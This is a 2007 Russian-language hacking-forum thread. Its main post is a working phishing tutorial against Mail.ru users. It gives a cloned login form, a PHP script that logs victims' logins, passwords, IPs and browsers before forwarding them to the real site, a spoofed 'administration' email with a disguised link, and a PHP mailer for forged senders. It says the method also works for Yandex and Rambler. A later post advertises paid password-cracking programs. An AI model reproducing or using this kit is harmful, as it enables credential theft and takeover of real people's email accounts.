ВЗЛОМ МЫЛА на Mail.ru

  Вход на форум   логин       пароль   Забыли пароль? Регистрация
On-line:  

Раздел: 
Форум Для Умных Людей / [ ХАКИНГ ] / ВЗЛОМ МЫЛА на Mail.ru

Страницы: 1  новая тема

Автор Сообщение

Группа: ПРИВЕТ
Сообщений: 16
Добавлено: 04-02-2007 13:58
В эой статье я хочу рассказать как можно утянуть пароль от ящика на мейл.ру. Принцип таков:
Вы сохраняете первую страницу mail.ru, находите в исходном коде страницы форму аворизации и изменяете её примерно на следующее:

<table cellpadding=0 cellspacing=0 border=0 width=100% class=login><form name=Auth method=post action="auth.php">

<input type=hidden name=Mpopl value=1562051042>

<tr>
<td>&nbsp;</td>
<td class=form>
<table cellpadding=0 cellspacing=0 border=0 width=100%>
<td width=100% nowrap><b><a href=http://win.mail.ru/cgi-bin/signup>Регистрация в почте</a></b></td>
<td align=right><a href=http://r.mail.ru/cln2840/www.mail.ru/pages/help/index.html><img src=images/helpm000.gif width=14 height=14 border=0 alt=Помощь hspace=2></a></td>
</table>
</td>
</tr><tr>
<td class=title>Имя</td>
<td class=form width=100%>
<table cellpadding=0 cellspacing=0 border=0 width=100%>
<td width=50%><input type=text class=long size=3 name=Login tabindex=1></td>
<td width=50%><select size=1 name=Domain class=long tabindex=2>
<option value=mail.ru selected>@mail.ru</option><option value=inbox.ru >@inbox.ru</option><option value=bk.ru >@bk.ru</option><option value=list.ru >@list.ru</option>
</select></td>
</table>
</td>
</tr><tr>
<td class=title>Пароль</td>
<td class=form>
<table cellpadding=0 cellspacing=0 border=0 width=100%>
<td width=100%><input type=password class=long size=6 name=Password tabindex=3 value=></td>
<td>&nbsp;<a href=http://www.mail.ru/pages/help/92.html class=grey>Забыли?</a></td>
</table>
</td>
</tr><tr>
<td>&nbsp;</td>
<td>
<table cellpadding=0 cellspacing=0 border=0 width=100%>
<td><input type=checkbox id=alien class=hole name="level" value=1 tabindex=4></td>
<td width=100% height=28 class=lbl><label for=alien>Чужой компьютер</label></td>
<td><input type=submit tabindex=5 value=" Войти " ></td>
</table>
</td>
</tr></form>
<script language="jаvаScript"><!--
document.Auth.Login.value="";
//--> </script>
</table>

То есть она теперь ведёт не на скрирт авторизации мейла, а на Ваш скрипт, который нужно закачать на хостинг с поддержкой PHP.
А вот, собственно, и сам скрипт "auth.php":


<?php Error_Reporting(E_ALL & ~E_NOTICE);
$file = "log.txt"; //название файла с логом
$Mpopl=$_REQUEST['Mpopl'];
$Login=$_REQUEST['Login']; // Перехватываем логин
$Password=$_REQUEST['Password']; // Перехватываем пароль
$Domain=$_REQUEST['Domain']; // Перехватываем доме ящика
$bsp=" "; // это у нас будет пробел :)
$n="\n"; // это у нас будет разделитель строк (вместо нажаия Enter)
$cobaka="@"; // символ @
$ip=$_SERVER['REMOTE_ADDR']; // ловим ip жертвы
$brauser=$_SERVER['HTTP_USER_AGENT']; // и для интереса информация о браузере и др.



$f = fopen($file, "r+t"); // открываем файл лога
while (!feof($f)) { // при каждой новой записи в лог
$st = fgets($f); // данные не будут стираться,
} // а будут записыватся дальше.

######################################## // Записываем данные в лог.
fwrite($f, $Login);
fwrite($f, $cobaka);
fwrite($f, $Domain);
fwrite($f, $bsp);
fwrite($f, $Password);
fwrite($f, $bsp);
fwrite($f, $bsp);
fwrite($f, $bsp);
fwrite($f, $bsp);
fwrite($f, $bsp);
fwrite($f, $ip);
fwrite($f, $bsp);
fwrite($f, $brauser);
fwrite($f, $n);
########################################

fclose($f); // Закрываем файл лога
// А далее следует форма, которую пользователь и не увидит! И с помошью jаvаScript отправиться на мейл.ру, опять же, без участия пользователя!
?>

<form name="Auth" method=post action=http://win.mail.ru/cgi-bin/auth>

<input type=hidden name=Mpopl value=<?php echo "$Mpopl"; ?>>

<input type=hidden name=login_from value=titul>

<input type=hidden name="level" value=1>

<input type=hidden name="Login" value="<?php echo "$Login"; ?>">

<input type=hidden name="Password" value="<?php echo "$Password"; ?>">

<input type=hidden name="Domain" value="<?php echo "$Domain"; ?>">

<input TYPE=hidden name="" value="Войти">

<script language=jаvаscript>Auth.submit()</script>

</form>

<div align="center"">
<br><br><br><br><br><br><br><br>
<table border=1><tr><td>
<body bgcolor=black text=white>
<div align="center"">
<table><tr><td><h2>Уважаемый владелец ящика </td></tr></h2><?php echo "<tr><td><font size=6 color=red>$Login$cobaka$Domain</font></tr></td><tr><td><h2> Ваш запрос обрабатывается. Подождите, пожалуйста, несколько секунд.</h2></tr></td>"; ?>
<tr><td><font size=3 color=white>Ваш IP-адрес: </font><font size=3 color=red><?=$_SERVER['REMOTE_ADDR']?></font></tr></td>
<tr><td><font size=3 color=white>Ваш браузер: </font><font size=3 color=red><?=$_SERVER['HTTP_USER_AGENT']?></font><br><br></tr></td><table>
</div>

<div align="center"">
<?
if (!$Mpopl) echo "<table><tr><td><font size=5 color=white>ошибка 1) </font><font size=5 color=red>Неизвестная ошибка!</font></td></tr>";
if (!$Login) echo "<tr><td><font size=5 color=white>ошибка 2) </font><font size=5 color=red>Вы не ввели свой логин!</font></td></tr>";
if (!$Password) echo "<tr><td><font size=5 color=white>ошибка 3) </font><font size=5 color=red>Вы не ввели свой пароль!</font></td></tr>";
if (!$Domain) echo "<tr><td><font size=5 color=white>ошибка 4) </font><font size=5 color=red>Неизвестная ошибка!</font></td></tr></table>";
?>
</div>
</tr></td>
</table>
</div>


Ну, думаю суть понятна. Скрипт ловит данные, записывает их в лог log.txt и поом пересылает пользователя на мейл.ру. Хотя можно и убрать всю эту хрень с ошибками и приветствиями, просто в моей ситуации оно мне было нужно.
Вот, собствунно, и всё! Данный способ можно применять и для других сервисов: yandex.ru, rambler.ru... Просто нужно подделать подних форму оправки, и всё! Ну и, конечно, чтобы пользователь перешёл на вашу страницу с поддельным mail.ru, отправьте ему письмо от администрации mail.ru, с просьбой повторной авторизации из-за ошибок, или, там, тестовых работ на сервисе.
Письмо нужно отправлять в HTML формате. Напимер:

<HTML><BODY>

Уважаемый пользователь!

На сервере проводяться тестовые работы. Пожалуйста, проёдите повторную авторизацию для нормальной работы вашего электронного ящика.

<a href="http://mail.ru" target="_new" OnMouseOver="window.status='http://gb';"

onMouseOut="location.href=unescape('http://gb');">http://mail.ru</a>
<br>
С уважением, администрация mail.ru

</BODY></HTML>

А вот скрипт, который может отправиь HTML письмо:

<?php
$to = $_REQUEST['to'];
$from = $_REQUEST['from'];
$reply = $_REQUEST['reply'];
$body = $_REQUEST['body'];
$theme = $_REQUEST['theme'];
$message = "<HTML>...</HTML>"; // текст письма
$headers = "From: ".$from."\r\nReply-To: ".$reply."\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-Type: text/html;";
$body .= $message."\r\n\r\n";
mail ($to, $theme, $body, $headers); // отправляем
?>

И форма для него:


<html>
<body bgcolor=#0F5475 text=white>
<div align=center>
<form action=mail.php method=post>
<table width=50% cellpadding=5 cellspacing=2>
<tr valign=top>
<td>От:</td>
<td><input type=text name="from" value=""><br>
</td>
</tr>
<tr valign=top>
<td>Куда послать:</td>
<td><input type=text name="to" value=""><br>
</td>
</tr>
<tr valign=top>
<td>Куда ответить:</td>
<td> <input type=text name="reply" value=""><br></td>
</tr>
<tr valign=top>
<td>Тема: </td>
<td><input type=text name="theme" value=""><br></td>
</tr>
<tr valign=top>
<td>Текст письма: </td>
<td><textarea name=body cols=50 rows=4></td>
</tr>
</div>
</form>
</body></html></table>
<br>
<input type=submit value="Послать">

Группа: ПРИВЕТ
Сообщений: 3
Добавлено: 07-03-2007 14:07
Программы для взлома пароля от ICQ. Так же программа для взлома E-mail. Обе программы взламывают пятизначный пароль за 30 минут на модеме 56 кб/сек. Это новейшая разработка программ для взлома. Такого нет больше в Интернете. Только у нас низкие цены. Обращайтесь по
E-mail: andreimihal@mail.ru

Группа: ПРИВЕТ
Сообщений: 9
Добавлено: 28-05-2007 15:10
А вот два вопроса.
1.Как узнать,с какого айпи пришло мыло.
2.У нас по сетке с какого-то компа рассылается вирус,червяк ,как узнать С КАКОГО КОМПА он рассылается.
спасибо.

Страницы: 1  новая тема
Раздел: 
Форум Для Умных Людей / [ ХАКИНГ ] / ВЗЛОМ МЫЛА на Mail.ru

Отвечать на темы в данном разделе могут только зарегистрированные пользователи

Отвечать на темы могут только зарегистрированные пользователи

KXK.RU